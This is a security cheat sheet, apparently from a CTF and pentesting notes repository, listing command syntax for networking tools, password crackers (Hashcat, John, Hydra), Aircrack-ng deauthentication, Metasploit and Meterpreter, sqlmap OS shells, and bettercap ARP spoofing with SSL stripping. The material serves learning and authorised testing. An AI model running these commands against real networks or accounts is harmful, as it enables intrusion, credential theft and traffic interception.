ping -c 4 example.com    # Ping example.com 4 times
ping -i 2 8.8.8.8        # Ping 8.8.8.8 with 2 second interval between packets
ping -t 10 8.8.8.8       # (Windows) Ping 8.8.8.8 10 times
ping -s 100 8.8.8.8      # Send 100 bytes of data per packet
ping -W 2 8.8.8.8        # Set timeout to 2 seconds for each reply

traceroute <IP_or_hostname>

# Example usage
traceroute google.com        # Trace the route to google.com
traceroute 8.8.8.8           # Trace the route to an IP address
traceroute -n google.com     # Trace the route to google.com without resolving hostnames

tracert <IP_or_hostname>

# Example usage
tracert google.com        # Trace the route to google.com
tracert 8.8.8.8           # Trace the route to an IP address
tracert -d google.com     # Trace the route to google.com without resolving hostnames

telnet <IP_or_hostname> <port>

# Example usage
telnet example.com 23     # Connect to example.com on port 23 (default Telnet port)

# Fetch the content of a URL 
curl <URL> 

# Downloading a file (save it with the same name as in the URL)
curl -O <URL>

curl -s -A "PicoBrowser" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" -H "X-Forwarded-For: 2.71.255.255" -H "Accept-Language: sv-SE" --referer http://mercury.picoctf.net:36622 http://mercury.picoctf.net:36622/ | grep -oI "picoCTF{.*}"

# Download a file from a URL
wget <URL>

# Download files from an FTP server recursively
wget -r ftp://ftpuser:<USER>@<IP> 

ftp <IP> 

ssh user@ip

ssh -i path_to_pem user@ip

ssh -D 8080 -C -q -N user@ip # Create a tunnel
chromium --no-sandbox --proxy-server="socks5://localhost:8080" # Use the tunnel

scp [options] source destination

# Copy a file to a remote server  
scp /path/to/file user@ip:/path/to/remote/file

# Copy a file from a remote server to a local server  
scp user@ip:/path/to/remote/file /path/to/file

# Example (file to a remote server ):  
scp example.txt berkan@192.168.100.123:/home/berkan/

xfreerdp [options] server[:port] [[options] server[:port] ...]

# Example usage
xfreerdp /u:username /p:password /v:hostname:port /cert:ignore /ipv6

netdiscover -i wlan0mon  # Scan for live hosts on the wlan0mon interface
netdiscover -r <ip>/24  # Scan a specific IP range

netstat -tulpn  # Display all active listening ports

ss -tulpn  # Display all active listening ports with process information

tcpdump -i <interface>  # Capture packets on a specific network interface

# Examples
tcpdump -i wlan0mon -n  # Capture packets on the wlan0mon interface without resolving hostnames
tcpdump -i wlan0mon -w capture.pcap  # Capture packets and save them to a file
tcpdump -i wlan0mon -r capture.pcap  # Read packets from a file
tcpdump -i wlan0mon -c 100  # Capture only 100 packets
tcpdump -i wlan0mon -q  # Capture packets with brief output
tcpdump -i wlan0mon -e  # Capture packets and include MAC addresses
tcpdump -i wlan0mon -A  # Capture packets and print packet data as ASCII

dig <domain> <type>  

# Example:
dig example.com A +short  # Get the A record for example.com in short format

wash -i wlan0mon  # Scan for networks using the wlan0mon interface
wash -i wlan0mon -C  # Scan for networks and show the channelerrors

whatweb <URL>  # Scan a specific URL

# Example usage:
whatweb --no-errors 10.10.10.0/24 # Scan a range of IP addresses

Compression & Archiving

In this section: Tar, Gzip, 7z

# Creating a tar archive
tar -cf archive.tar file1.txt file2.txt 

# Extracting a tar archive (most common)
tar -xf archive.tar 

# Compressing files with tar
tar -czvf stuff.tar.gz file1.txt file2.txt 

# Uncompressing files with tar
tar -xvzf myfolder.tar.gz -C myfolder/  # Extract the contents into the myfolder directory

# Compress a file
gzip filename.txt 

# Compress a directory (recursively)
gzip -r directory/ 

# Compress multiple files
gzip file1.txt file2.txt 

# Decompress a file
gzip -d filename.txt.gz  # or use 'gunzip filename.txt.gz'

# Create a 7z archive
7z a archive.7z file1.txt file2.txt

# Extract a 7z archive
7z x archive.7z

# Compress a directory
7z a archive.7z directory/

# Create a password-protected 7z archive
7z a -p<SECRET> archive.7z file1.txt file2.txt

# Extract a password-protected 7z archive
7z x archive.7z -p<SECRET>

# Create a password-protected 7z archive  
7z a <Zip folder> <Files or *> -p<SECRET>

# Extract a password-protected 7z archive  
7z x <Zip folder> -p<SECRET>

7z a -tzip -p123 -mem=AES256 secret.zip secret

Cryptography & Encoding

In this section: base64 (Encoding), rax2 (Base Conversion), hashid (Hash Identification), hash-identifier (Hash Identification), haiti (Hash Analysis), shasums (SHA Checksums), gpg (Encryption/Decryption)

base64 -d file.txt

base64 -i input.txt -o output.txt

rax2 <options> <value>

# Convert hex string to raw bytes
rax2 -s 0x424b  

-a      show ascii table     ;  rax2 -a
-b      bin -> str           ;  rax2 -b 01000010 01001011 # BK
-B      str -> bin           ;  rax2 -B hello # 0110100001100101011011000110110001101111
-d      force integer        ;  rax2 -d 3 -> 3 instead of 0x3
-D      base64 decode        ;  rax2 -D SGVsbG8gd29ybGQ= # Hello world
-E      base64 encode        ;  rax2 -E Hello world # SGVsbG8gd29ybGQ=
-f      floating point       ;  rax2 -f 6.3+2.1
-I      IP address <-> LONG  ;  rax2 -I 3530468537 # 185.172.110.210
-k      keep base            ;  rax2 -k 33+3 -> 36
-K      randomart            ;  rax2 -K 0x34 1020304050
-L      bin -> hex(bignum)   ;  rax2 -L 111111111 # 0x1ff
-n      binary number        ;  rax2 -n 0x1234 # 34120000
-o      octalstr -> raw      ;  rax2 -o \162 \62 # r2
-N      binary number        ;  rax2 -N 0x1234 # \x34\x12\x00\x00
-r      multiple outputs     ;  rax2 -r 0x1234 
-s      hexstr -> raw        ;  rax2 -s 42 4b # BK
-S      raw -> hexstr        ;  rax2 -S < /bin/ls > ls.hex
-t      tstamp -> str        ;  rax2 -t 1234567890 # Sat Feb 14 00:31:30 2009
-x      hash string          ;  rax2 -x linux #0x5ca62a43
-u      units                ;  rax2 -u 389289238 # 317.0M
-w      signed word          ;  rax2 -w 16 0xffff

hashid [options] hash

# Example usage
hashid 5d7845ac6ee7cfffafc5fe5f35cf666d

hash-identifier <hash>

haiti <hash>

shasum file.txt

sha256sum file.txt

md5sum file.txt

gpg -c data.txt

gpg -d data.txt.gpg

Exploitation & Pentesting Tools

In this section: searchsploit, cewl, crunch, fcrackzip

searchsploit [options] term1 term2 term3 ...

# Example usage
searchsploit windows local

cewl <url> -w <output file>

# Example usage
cewl https://example.com -w wordlist.txt

crunch <min> <max> <characters>

# Generate a wordlist with all combinations of 8 characters from the alphabet
crunch 8 8 abcdefghijklmnopqrstuvwxyz -o wordlist.txt

fcrackzip [options] <wordlist path> <filepath>

# To use a dictionary attack with a wordlist and unzip a file
fcrackzip -Dupvb /usr/share/wordlists/rockyou.txt secret.zip

# To unzip a file with a password
fcrackzip -u -p <password> secret.zip

Compilers

In this section: gcc

gcc [options] <input>

# Compile hello.c to an executable named hello
$ gcc -o hello hello.c 
$ ./hello  # Run the compiled program

Tools (CLI)

Command-line tools for security testing and analysis. Start with Nmap for network discovery, then web tools like Gobuster.

Legal Notice: Only use on systems you own or have permission to test.

Aircrack-ng

Aircrack-ng - is a complete suite of tools to assess WiFi network security

# Monitor mode
airmon-ng start wlan0

# Capture packets
airodump-ng wlan0mon

# Target specific network
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Deauth attack (to capture handshake)
aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon

# Crack WPA/WPA2 with wordlist
aircrack-ng -w wordlist.txt capture-01.cap

Key tools in suite:

• airmon-ng: Enable/disable monitor mode
• airodump-ng: Capture packets and show wireless networks
• aireplay-ng: Inject packets (deauth, fake auth)
• aircrack-ng: Crack WEP/WPA keys

See detailed cheatsheet here

Gobuster

Gobuster is a tool used to brute-force URIs (directories and files), DNS subdomains and virtual host names

Syntax

gobuster -w wordlist.txt

Examples:

Standard scan
gobuster dir -u http://172.162.39.86 -w /usr/share/wordlists/dirb/megalist.txt

DNS subdomain enumeration
gobuster dns -d http://172.162.39.86 -w /usr/share/SecLists/Discovery/DNS/namelist.txt

A list of options

dir Directory/file brute forcing mode
dns DNS bruteforcing mode

A list of most useful flags:

-u (url) – full target URL (including scheme), or base domain name.
-w (wordlist) – path to the wordlist used for brute forcing (use – for stdin).
-a (user agent string) – specify a user agent string to send in the request header.
-e (print) - Print the full URLs in your console
-o (file) – specify a file name to write the output to.
-x (extensions) – list of extensions to check for, if any.
-P (password) – HTTP Authorization password (Basic Auth only, prompted if missing).
-U (username) – HTTP Authorization username (Basic Auth only).
-c <http cookies> (cookie) - Specify a cookie for simulating your auth
-s (status-codes) - Set status codes that should be interpreted as valid
-k (ssl) - Skip ssl certificate
-H (HTTP) - Specify HTTP header
-t (threads) - Number of concurrent threads (default: 10)
-v (verbose) - Verbose output
-q (quiet) - Quiet output
-n (no-redirect) - Do not follow redirects
-r (recursive) - Recursively brute force subdirectories

Find a list of seclists here.

Feroxbuster

feroxbuster uses brute force combined with a wordlist to search for unlinked content in target directories.

Syntax:
feroxbuster [OPTIONS]

Example:
feroxbuster -u https://berkankutuk.dk -w /usr/share/wordlists/dirb/big.txt

Options:
-h, --help - Print help information
-V, --version - Print version information
-u, --url <URL> - The target URL
-b, --cookies <COOKIE> - Specify HTTP cookies to be used in each request
-m, --methods <HTTP_METHODS> - Which HTTP request method(s) should be sent (default: GET)
-x, --extensions <FILE_EXTENSION> - File extension(s) to search for (ex: -x php -x pdf js)
-C, --filter-status <STATUS_CODE> - Filter out status codes (deny list) (ex: -C 200 -C 401)
-s, --status-codes <STATUS_CODE> - Filter status codes (allow list) (default: 200 204 301 302 307 308 401 403 405)
-r, --redirects - Allow client to follow redirects
-T, --timeout <SECONDS> - Number of seconds before a client’s request times out (default: 7)
-d, --depth <RECURSION_DEPTH> - Maximum recursion depth, a depth of 0 is infinite recursion (default: 4)
-e, --extract-links - Extract links from response body and make new requests based on findings
-L, --scan-limit <SCAN_LIMIT> - Limit total number of concurrent scans (default: 0, i.e. no limit)
-n, --no-recursion - Do not scan recursively
-t, --threads <THREADS> - Number of concurrent threads (default: 50)
--time-limit <TIME_SPEC> - Limit total run time of all scans (ex: –time-limit 10m)
-w, --wordlist <FILE> - Path to the wordlist
-o, --output <FILE> - Output file to write results
-v, --verbosity - Increase verbosity level (use -vv or more for greater effect. ‘4’ -v’s is probably too much)

Hashcat

Hashcat is a particularly fast, efficient, and versatile hacking tool that assists brute-force attacks by conducting them with hash values of passwords that the tool is guessing or applying. See Cheatsheet.

Learn How to brute-force passwords using GPU and CPU in Linux.
Convert WPA/WPA2 handshake from a pcap file to a modern hashcat compatible hash file.

Syntax

hashcat -m <number> <hash_file> <dict_file>

Example

Dictionary
hashcat -m 1800 -a 0 hashed.txt /usr/share/wordlists/rockyou.txt -o output.txt

Bruteforce
hashcat -m 0 -a 3 -i hashed.txt ?a?a?a?a?a?a?a -o output.txt

Flags

-m sets the mode
-a sets the attack mode (0=Straight,1=Combination,3=Bruteforce,6=Hybrid:wlist+mask,7=Hybrid:mask+wlist)
-o output to filename
-r sets rules
--status keep screen updated
--runtime abort after X seconds
--force sets workload to insane (This can lead to false positives)
-i increment (bruteforce)

Attack modes

0=Straight
1=Combination
3=Bruteforce
6=Hybrid:wlist+mask
7=Hybrid:mask+wlist

Charsets

?l Lowercase a-z
?u Uppercase A-Z
?d Decimals
?h Hex using lowercase chars
?H Hex using uppercase chars
?s Special chars
?a All (l,u,d,s)
?b Binary

Hydra

Hydra is a tool used to brute-force username and password to different services such as ftp, ssh, telnet, MS-SQL, etc.

Syntax

hydra -options path

Examples:

Guess SSH credentials using a given username and a list of passwords:
hydra -l username -P path/to/wordlist.txt host_ip -t 4 ssh -V

Guess Telnet credentials using a list of usernames and a single password, specifying a non-standard port and IPv6:
hydra -L path/to/usernames.txt -p password -s port -6 host_ip telnet

Guess FTP credentials using usernames and passwords lists, specifying the number of threads:
hydra -L path/to/usernames.txt -P path/to/wordlist.txt -t n_threads host_ip ftp

Guess MySQL credentials using a username and a passwords list, exiting when a username/password pair is found:
hydra -l username -P path/to/wordlist.txt -f host_ip mysql

Web form credentials:
hydra -l admin -P /usr/share/wordlists/rockyou.txt <ip_adress> http-post-form "/login:username=^USER^&password=^PASS^:F=Username or password invalid" -V

Guess IMAP credentials on a range of hosts using a list of colon-separated username/password pairs:
hydra -C path/to/username_password_pairs.txt imap://[host_range_cidr]

Guess POP3 credentials on a list of hosts using usernames and passwords lists, exiting when a username/password pair is found:
hydra -L path/to/usernames.txt -P path/to/wordlist.txt -M path/to/hosts.txt -F pop3

A list of most useful options:

-S connect via SSL
-f specify host
-s specify a port
-l single username
-L wordlist username(s)
-p single password
-P wordlist password(s)
-o FILE write found login/password pairs to FILE instead of stdout
-V verbose mode, see output for every attempt
-I ignore the resume dialog
-t <number> specifies the number of threads to use
-u by default Hydra checks all passwords for one login and then tries the next login. This option loops around the passwords, so the first password is tried on all logins, then the next password.

John The Ripper

John The Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, and other. Cheatsheet

Syntax

john <hash_file> --wordlist=<wordlist>

Examples

Cracking MD5 hashes
john --format=raw_md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

SSH Private Key

Crack hashed private key
python /usr/share/john/ssh2john.py id_rsa > hash.txt

ssh2john.py can sometimes also be located under /opt/john/ssh2john.py

Crack the hash (or a shadow file)
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

See more about JTR.

Zip Files

Crack a zip file using zip2john

First, convert the zip file to a hash
zip2john file.zip > zip.hash

Then crack the hash
john zip.hash

Metasploit

The Metasploit Framework is a powerful tool for penetration testing, exploit development, and vulnerability research, offering modules for information gathering, scanning, exploitation, and post-exploitation.

• Auxiliary: Supports modules like scanners, crawlers, and fuzzers.
• Encoders: Encode exploits and payloads to evade signature-based antivirus detection.
• Payloads:
  • Singles: Self-contained payloads (e.g., add user, open app) that run without additional downloads.
  • Stagers: Establish connection channels between Metasploit and the target, facilitating the download of staged payloads.
  • Stages: Larger payloads downloaded by stagers to expand functionality.

Single payloads use an underscore (e.g., generic/shell_reverse_tcp), while staged payloads use a slash (e.g., windows/x64/shell/reverse_tcp).

How to use

Initialize the database
msfdb init

View advanced options for starting the console
msfconsole -h

Start metasploit
msfconsole

Check db connection
db_status

Msf commands
help or ? - shows the help page

Search exploit
search <exploit_for>

Select module
use <module>

Change value of a variable
set <variablename> <value>
get <variablename>
unset <variablename>

Save msfconsole session
save

Save console outputs
spool

See privileges of a current user
getprivs

Tranfer files to victim computer
upload

Check if the victim pc is in a VM (Windows)
run post/windows/gather/checkvm

See what a machine could be vulnerable to
run post/multi/recon/local_exploit_suggester

Spawn a normal system shell
shell

Meterpreter

Meterpreter is a Metasploit payload that runs in memory on the target system without installation, avoiding detection by antivirus, IDS, and IPS. It communicates with Metasploit via encrypted channels but can still be detected by some antivirus programs.

Key Features:

• Post-exploitation: Allows further data gathering, privilege escalation, and lateral movement.
• Migrate: Move to another process (e.g., word.exe) to interact with it or capture keystrokes. Use migrate <PID>.

  • You may lose your user privileges if you migrate from a higher privileged (e.g. SYSTEM) user to a process started by a lower privileged user (e.g. webserver).

• Hashdump: Dumps the SAM database of Windows to retrieve NTLM password hashes for cracking or Pass-the-Hash attacks. One example of this is ntlm.pw.
• Search: Use search -f <filename> to locate files with sensitive data.
• Shell: Launches a standard command-line shell on the target. Use CTRL+Z to return to Meterpreter.

These features make Meterpreter a powerful tool for post-exploitation activities.

See some of the available commands here.

Netcat

Netcat aka nc is an extremely versatile tool. It allows users to connect to specific ports and send and receive data. It also allows machines to receive data and connections on specific ports, which makes nc a very popular tool to gain a Reverse Shell.

Syntax

Computer B (acts as the receiving server):
nc -lvnp 6790 > testfile.txt
Computer A (acts as the sending client):
nc [IP address of computer B] 6790 < testfile.txt

# Computer A
nc -lvp 1337

# Computer B
nc -v <ip_pc_a> 1337

A list of most useful switches:

-l Listen to connections (TCP)
-v Enable verbose mode (allows you to see who connected to you)
-p Specify a port to listen to
-e Specify program to execute after connecting to a host
-u Connect to UDP ports
-n Fast scan by disabling DNS resolution
-w Define timeout value
-4 IPv4 only
-6 IPv6 only
> Server file redirection
< Client file redirection

Nikto 2

Nikto 2 or nikto is a popular web scanning tool that allows users to find common web vulnerabilities. It is commonly used to check for common CVE’s such as shellshock, and to get general information about the web server that you’re enumerating.

Syntax

nikto -h <ip> -port <port>

A list of most useful flags:

-h Hostname/IP adress
-port Specify ports
-nossl Disable ssl
-ssl Force ssl
-id Specify authentication(username & password)
-plugin Select which plugin to use
-update Update the plugin list
--list-plugins List all possible plugins to use
-output Output fingerprinted information to a file

Nmap

Nmap is a utility for network discovery and security auditing.

Note, there is now a better and much faster alternative to nmap called rustscan. See more about it here.

Syntax

nmap [options] [ip]

Example:
nmap -sT -T4 -A -p- 172.162.39.86

A list of most useful switches:

TCP scan (Most likely to be filtered)= -sT
TCP Syn Scan (No logging)= -sS
UDP scan (Slow)= -sU

ICMP Scanning (host discovery, no port scans) = -sn
Default ping scanning) = -sP
Detect OS = -O
Detect version of services = -sV
Scan with the default nmap scripts = -sC
Disable host discovery and just scan for open ports = -Pn
ARP Scan (only on same subnet as target) = -PR
Change verbosity = -v
Change verbosity level two = -vv (It’s good practice to always increase the verbosity in your scans.)

Save nmap results in three major formats = -oA [filename] [target]
Save nmap results in a text file = -oN [filename] [target]
Save nmap results in grepable format = -oG [filename] [target]

Aggresive mode (Enable OS detection, version detection, script scanning, and traceroute) = -A
Timing leves (Speed of scans, can make errors) = -T<Level> (0-5)
Port scan (specific)= -p <port>
Port scan (range) = -p <from>-<to>
Port scan (all) = -p-
Activate a script= —-script=<script_name>
Decoy an ip adress, learn more = -D
Fast mode = -F Only open ports = --open
List of hosts to scan = -iL
No DNS lookup = -n
Reverse DNS lookup = -R

Scan an IPv6 address = -6

Subnet mask with 255.255.255.0 = <ip>/24

RustScan

RustScan is a fast and extensible port scanner written in Rust. See more.

Syntax

rustscan -a 127.0.0.1 -p 53,80,121,65535

Options
-a A list of comma separated CIDRs, IPs, or hosts to be scanned
-b <size> Batch size for parallel scanning (default 4500)
-p <port1>,<port2> A list of commaseperated ports.
-r <range> Specify range of ports (ex. 1-1000)
--scripts <script> Run scripts
-t <timeout> Timeout in milliseconds to consider port closed (default 1500)
--tries <tries> Number of tries to consider port closed (default 1)
-q Quiet mode.

Note: RustScan, at the moment, runs Nmap by default. So you can also specify commsnds like -sC and -A.

SQLMap

SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

Syntax

sqlmap <option> <url>

Options

-u - URL to test for SQL injection
-g - Google Dork to test for SQL injection
-p - Parameter to test for SQL injection
-D - Dump a specific database to enumerate
-T - Dump a specific table to enumerate
-C - Dump specific columns to enumerate
--level - Level of tests to perform (1-5)
--dbms - Force SQLMap to use a specific DBMS
--dump - Dump the contents of the database
--dump-all - Dump all databases
--os-shell - Get an OS shell
--batch - Automatic run, won’t ask for user input
--tables - Dump all tables
--columns - Dump all columns
--threads - Number of threads to use
--level - Level of tests to perform (1-5 def: 1)
--risk - Risk of tests to perform (1-3 def: 1)
--dbs - List databases
--technique - Specify a technique to use

(B: Boolean-based blind, E: Error-based, U: Union-based, S: Stacked queries, T: Time-based blind)

SQLMap to try and bypass the WAF by using --tamper=space2comment

Example use case

Test for SQL injection.

sqlmap.py -u <website> --dbs

Dumping some data inside columns from a table in a database. List tables in a database.

sqlmap.py -u <website> -D <database_name> --tables

List columns in a table in a database.

sqlmap.py -u <website> -D <database_name> -T <table_name> --columns

Dump data from columns in a table in a database.

sqlmap.py -u <website> -D <database_name> -T <table_name> -C <column_name1>,<column_name2> -dump

Tools (GUI)

Graphical tools provide intuitive interfaces for complex security tasks. While CLI tools offer speed and automation, GUI tools excel at visualization, analysis, and collaborative work.

When to Use GUI Tools:

• Complex data analysis and visualization
• Learning new concepts with visual feedback
• Collaborative investigations where sharing screens helps
• Deep dive analysis requiring multiple perspectives

Autopsy

Digital forensics platform that analyzes hard drives, smartphones, and other storage devices.

Key Features:

• File system analysis (NTFS, FAT, Ext2/3/4, HFS+)
• Deleted file recovery
• Timeline analysis
• Keyword searching
• Hash analysis (MD5, SHA1, SHA256)
• Email analysis
• Registry analysis (Windows)

Common Workflow:

1. Create new case
2. Add data source (disk image, drive, logical files)
3. Configure ingest modules (hash lookup, keyword search, etc.)
4. Analyze results in various views
5. Generate reports

Supported Formats:

• Raw/DD images
• E01 (EnCase)
• AFF (Advanced Forensic Format)
• VHD/VMDK (Virtual disks)

Burp

Burp Suite, a framework of web application pentesting tools, is widely regarded as the de facto tool to use when performing web app testing

Setting up Burp Suite

Download Burp Suite here.
Burp Suite requires Java JRE in order to run. Download and install Java here.

Gettin’ CA Certified

We need to install a CA certificate as BurpSuite acts as a proxy between your browser and sending it through the internet - It allows the BurpSuite Application to read and send on HTTPS data.

1. Download Foxy Proxy in order to fully leverage the proxy, we’ll have to install the CA certificate included with Burp Suite (otherwise we won’t be able to load anything with SSL).
2. Now click on the extension -> Options -> Add -> Fill in the fields with the following values:
   1. Title = Burp
   2. Proxy type = HTTP
   3. Proxy IP adress or DNS name = 127.0.0.1
   4. Port = 8080
   5. Username and password is optional.
3. And hit save.
4. Finally, click on the FoxyProxy extension icon again and select ‘Burp’.
5. With Firefox, navigate to the following address: http://localhost:8080
6. Click on ‘CA Certificate’ in the top right to download and save the CA Certificate.
7. Now that we’ve downloaded the CA Certificate, move over to the settings menu in Firefox. Search for ‘Certificates’ in the search bar.
8. Click on ‘View Certificates’. Next, in the Authorities tab click on ‘Import’ and then OK.

Overview of Features

• Proxy - Burp Proxy allows us to intercept and modify requests/responses when interacting with web applications.
• Target - How we set the scope of our project. We can also use this to effectively create a site map of the application we are testing.
• Intruder - Incredibly powerful tool for everything from field fuzzing to credential stuffing and more
• Repeater - Allows us to capture, modify, then resend the same request numerous times. This feature can be absolutely invaluable, especially when we need to craft a payload through trial and error (e.g. in an SQLi – Structured Query Language Injection) or when testing the functionality of an endpoint for flaws.
• Sequencer - Analyzes the ‘randomness’ present in parts of the web app which are intended to be unpredictable. This is commonly used for testing session cookies.
• Decoder - As the name suggests, Decoder is a tool that allows us to perform various transforms on pieces of data. These transforms vary from decoding/encoding to various bases or URL encoding.
• Comparer - Comparer as you might have guessed is a tool we can use to compare different responses or other pieces of data such as site maps or proxy histories (awesome for access control issue testing). This is very similar to the Linux tool diff.
• Extender - Similar to adding mods to a game like Minecraft, Extender allows us to add components such as tool integrations, additional scan definitions, and more!
• Scanner - Automated web vulnerability scanner that can highlight areas of the application for further manual investigation or possible exploitation with another section of Burp. This feature, while not in the community edition of Burp Suite, is still a key facet of performing a web application test.

Benefits

1. Requests will by default require our authorization to be sent.
2. We can modify our requests in-line similar to what you might see in a man-in-the-middle attack and then send them on.
3. We can also drop requests we don’t want to be sent. This can be useful to see the request attempt after clicking a button or performing another action on the website.
4. And last but not least, we can send these requests to other tools such as Repeater and Intruder for modification and manipulation to induce vulnerabilities

Notes

• URL Encode with Burp Suite: Ctrl + U to make a payload safe to send.
• Intruder attack types:
  • Sniper: Sends a single request to each selected item, typically used for targeted attacks. (e.g. a password bruteforce if we know the username)
  • Battering ram: Sends multiple identical requests to selected items, ideal for brute force attacks.
  • Pitchfork: Sends a combination of two payloads, one to the first item and another to the second item, useful for testing parameter-level vulnerabilities. (e.g. we know the username and password for a user)
  • Cluster bomb: Sends multiple payloads to each selected item, useful for discovering new vulnerabilities. (tries every combination of values)
• Python modules can be installed from the BApp Store, by downloading Jython Jar file and placing it in the extender -> options -> python environment.
• Extensions can be created using the Burp Extender API with either Java, Python or Ruby.

Nessus

Nessus is a GUI based vulnerability scanner

Download and installation

1. Click here and register an account.
2. Download the Nessus-#.##.#-debian6_amd64.deb file
3. Navigate to the download and run the following command: sudo dpkg -i package_file.deb
4. Start the nessus service wit the command: sudo /bin/systemctl start nessusd.service
5. Open up Firefox and goto the following URL: https://localhost:8834/ (Accept risk in case you get prompted)
6. Choose “Nessus Essentials” and click next. Skip when asked for a activation code
7. Login with your account
8. Wait for installation and then login again

Navigation and Scans

Launch a scan = Hit the “New Scan”
Side menu option that allows us to create custom templates = Policies
Change plugin properties such as hiding them or changing their severity = Plugin rules

Scans

Wireshark

Wireshark is a tool used for creating and analyzing PCAPs (network packet capture files)

Since this section is very large, I’ve created an individual page for this, which can be found inside this repository by clicking here.

Text Editors

Nano

Nano is an easy to use command line text editor

Shortcuts

^G Display help text.
^O Write the current file to disk
^X Exit nano.
^T Invoke spellc­heck, if installed.
^Y Next screen.
^V Previous screen.
^L Refresh (force redraw) current screen.
^J Justify current paragraph. (Join together broken lines of text until double newline is encoun­tered.)
^W Search for a string or regular expres­sion.
^\ Search and replace a string or regular expres­sion

Vim

Vim is a free and open-source, screen-based and highly customizable text editor program for Unix

Modes

Generally speaking, there are three basic modes in Vim:

Command mode – allows you to run commands (Default).
Insert mode – allows you to insert/write text.
Visual mode – visual text selector.

Basic keybinds

h – move the cursor left
j – cursor down
k – cursor up
l – move the cursor right
i – enter the insert mode
esc – enter the command mode
$ – move to the end of the line
yy – copy a line
p – paste
d – delete a line
x – cut a character

Basic commands:

:q – quit
:wq – write & quit
:q! – quit without saving
/word – search for ‘word’ in the document
:vimgrep – grep integration in Vim (allows to search in multiple files)

Find other very usefull commands here, or a full cheatsheet here.

Networking

Networking fundamentals for cybersecurity. Understanding IP addresses, ports, and protocols is essential for security work.

Internet Protocol (IP)

An IP address is like a postal address for devices on a network - it tells data where to go.

Example: 192.168.1.204

Key IP Address Types

# Private IP Ranges (not routable on internet)
10.0.0.0/8        # 10.0.0.0 - 10.255.255.255
172.16.0.0/12     # 172.16.0.0 - 172.31.255.255  
192.168.0.0/16    # 192.168.0.0 - 192.168.255.255

# Special Addresses in 192.168.1.x network
192.168.1.0       # Network address (first address)
192.168.1.1       # Default gateway (usually router)
192.168.1.255     # Broadcast address (last address)

Broadcast Address: Sending data here reaches ALL devices on the network (useful for discovery attacks).

IPv4

IP addresses consists of 32 bits:
11000000.10101000.00000001.11001100 = 192.168.1.204

Or in hex
c0.a8.01.cc = 192.168.1.204

So a full IP address is made up by 8x4 bits(32-bits), where they are seperated by a dot after every 8 bits meaning there are 4 groups which is also called “octets”.

Since an octet consists of 8 bits and there are 4 octets, a valid IP address can only be a number between 0 and 255, meaning it can be 256 different numbers:
(0-255).(0-255).(0-255).(0-255)

This makes the IP pool to have 2^32 = 4,294,967,296 different IP addresses that can be assigned.

The router

A router assigns IP addresses to devices on a home network using a “pool” of addresses, ensuring no duplicates. This process, called dynamic IP assignment, uses the DHCP protocol.

When a device wants to connect outside the network, it communicates through the default gateway (the router), typically 192.168.1.1.

IPv4 Classes

Notes

• 127.0.0.0 is missing from the IP classes (16 million addresses) because they are loopback addresses on your local device. Normally used for network testing
• Class C gives us the the most networks and smaller hosts per network.

Subnetting

Subnet mask

A subnet mask can look like this:
255.255.255.0

If there is a 255, then the corresponding octet in the IP address will stay the same, but if the number is 0, then that octet can anything in between 0-255. Example:
Subnet mask = 255.255.255.0
IP address = 192.168.1.204

The first 3 octets of the IP address 192.168.1.* will stay the same where the last octet “*” in our case is 204, which in fact is valid since the number can be anything in between 0-255

So the octets that never change is called the “Network portion” where the octet on a subnet mask zero is called the “Host”.

IANA

IANA assigns IP addresses to a company. For example, IBM have the network range 9.0.0.0 which is a class A IP address. This gives the company the ability to slice up a network with another subnet mask, since the subnet mask for the Class A is only a default or a minimum they have to have. Example

IP = 9.1.4.0
Subnet mask = 255.255.255.0
= 256 other networks

The Class A network became a Classless network (when you cut up a network using a different subnet mask). Nowadays, we mainly do classles networks to take advantage of the IP addresses we need to use.

So in other words, big and massive networks can become into a smaller network.

Address Resolution Protocol (ARP)

Address Resolution Protocol (ARP) is a protocol or procedure that connects an ever-changing Internet Protocol (IP) address to a fixed physical machine address, also known as a media access control (MAC) address, in a local-area network (LAN)

So if the IP is known but the MAC adress is not, a request is broadcasted to every device on the network in order to match an IP address to its corresponding MAC address. This record is then maintained and saved to a table called ARP cache.

An ARP request contains the following information:

1. The senders IP address.
2. The senders MAC adress.
3. The IP address we want to learn the MAC address for.

Dynamic and static records

When a broadcast is made, a dynamic record is made. This can be made by typing the following command:
arp-scan -l -I <interface>

arp-scan is a tool that can be used to scan for IP and MAC addresses on a local network. It can be installed with the command: sudo apt install arp-scan

sudo arp-scan -I eth0 -l will send ARP queries for all valid IP addresses on the eth0 interface.

If we have the IP and MAC address values, a manual thus static record can be made. This is done with the command:
arp -s <IP_Address> <MAC_Address>

See all ARP entries with the command:
arp -a

ARP Poisoning

Since it is possible to manually add entries to an ARP table, a few attack types can be made. These include:

1. Inflating the ARP cache thus making it non-responsive
2. Change the traffic on a network in order to listen for a traffic coming from a target. (MitM)
3. Changing the traffic and completely stopping the traffic for a target device.

Flushing an ARP cache
This can be made with the following command:
arp -s -s neigh flush all

This command will delete every dynamic entry there is. The static ones will not be deleted since we added them manually. To remove the static entries run:
arp -d <IP_Address>

ARP Spoofing

ARP spoofing is a type of MITM (man-in-the-middle attack) in which a malicious actor sends falsified ARP (Address Resolution Protocol) messages over a local area network. This results in the linking of an attacker’s MAC address with the IP address of a legitimate computer or server on the network.

# Redirect flow
arpspoof -i <interface> -t <target_ip> <gateway_ip>
arpspoof -i <interface> -t <gateway_ip>

# Fool victim and gateway
echo 1 > /proc/sys/net/ipv4/ip_forward # Act as a router. 

# Boot up bettercap
bettercap -iface <interface>

# Start ARP spoofing
net.probe on
set arp.spoof.fullduplex true
set arp.spoof.targets <target_ip>
arp.spoof on
net.sniff on

# Bypass HTTPS by downgrading it to HTTP
# SSL strip, and needs change
set net.sniff.local true
set net.recon on

# HSTS bypass
hstshijack/hstshijack # Works for websites using HTTPS and not HSTS

Web Exploitation

Common web application vulnerabilities and how to exploit them.

Content Discovery

Content discovery is divided into four parts, being manual, automated, OSINT and subdomain enumeration.

Manual

1. Check the robots.txt file for disallowed/hiddenpages
2. Check if there is /admin/ page
3. Check if there is any pages ( ~ and .bak and .swp
4. Check for git repositories /.git/. GitTools can be used in order to automatically scrape and download a git repository hosted online with a given URL.
